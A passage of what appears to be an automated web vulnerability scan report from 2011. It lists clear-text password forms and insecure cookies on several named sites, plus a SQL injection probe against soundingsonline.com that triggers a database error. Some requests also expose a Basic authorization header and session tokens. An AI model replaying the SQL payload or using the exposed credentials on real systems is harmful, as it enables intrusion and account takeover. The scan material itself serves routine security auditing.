   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.276. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/64-bit-vista-drivers.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /drivers/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.277. http://www.x64bitdownload.com/featured-software.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /featured-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /featured-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:35 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.278. http://www.x64bitdownload.com/linktous.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /linktous.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /linktous.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.279. http://www.x64bitdownload.com/new-reviews.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-reviews.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /new-reviews.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:26 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.280. http://www.x64bitdownload.com/new-software.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /new-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:21 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.281. http://www.x64bitdownload.com/saved-software.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /saved-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /saved-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.282. http://www.x64bitdownload.com/saved-software.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /saved-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /saved-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           <form action="login.html" method="post">
                           <table border="0" width="95%">
...[SNIP]...
<td><input type="password" name="password" size=30 class="input01">&nbsp;<input type="submit" name="submit" value="Login" >
...[SNIP]...

6.283. http://www.x64bitdownload.com/software-advanced.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /software-advanced.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.284. http://www.x64bitdownload.com/submit-pad-file.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /submit-pad-file.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /submit-pad-file.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.285. http://www.x64bitdownload.com/tellafriend.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /tellafriend.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /tellafriend.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.286. http://www.x64bitdownload.com/top-software-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /top-software-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /top-software-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

7. SQL statement in request parameter

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...

8. SSL cookie without secure flag set
There are 31 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://acc.newsguy.com/a/memsubmit.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://acc.newsguy.com
Path:   /a/memsubmit.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
  • DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/memsubmit.asp HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
Set-Cookie: DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
Content-Length: 5174
Expires: Mon, 24 Jan 2011 15:01:46 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>NewsGuy - Membership Drive</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsgroup messages
...[SNIP]...

8.2. https://billing.cloudaccess.net/cart.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://billing.cloudaccess.net
Path:   /cart.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.php?a=add&pid=41 HTTP/1.1
Host: billing.cloudaccess.net
Connection: keep-alive
Referer: http://www.cloudaccess.net/pricing.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...

8.3. https://www.bmwusa.com/Secured/FrameCheck.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bmwusa.com
Path:   /Secured/FrameCheck.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
  • ASP.NET_SessionId=hwiose4551oubw55xmxold55; path=/; HttpOnly
  • NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw== HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:12:50 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=hwiose4551oubw55xmxold55; path=/; HttpOnly
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/
Content-Length: 893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

8.4. https://www.isc.org/software/inn

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.isc.org
Path:   /software/inn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:03:30 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8k DAV/2 PHP/5.2.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.12
Set-Cookie: SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:03:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

8.5. https://acc.newsguy.com/user/-/accnt_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_billing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_billing HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/customer_referrals
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22337

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Billing Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

8.6. https://acc.newsguy.com/user/-/accnt_contact

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_contact

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_contact HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_billing
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 8709

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Contact Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

8.7. https://acc.newsguy.com/user/-/accnt_flash

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_flash

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
  • DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_flash HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
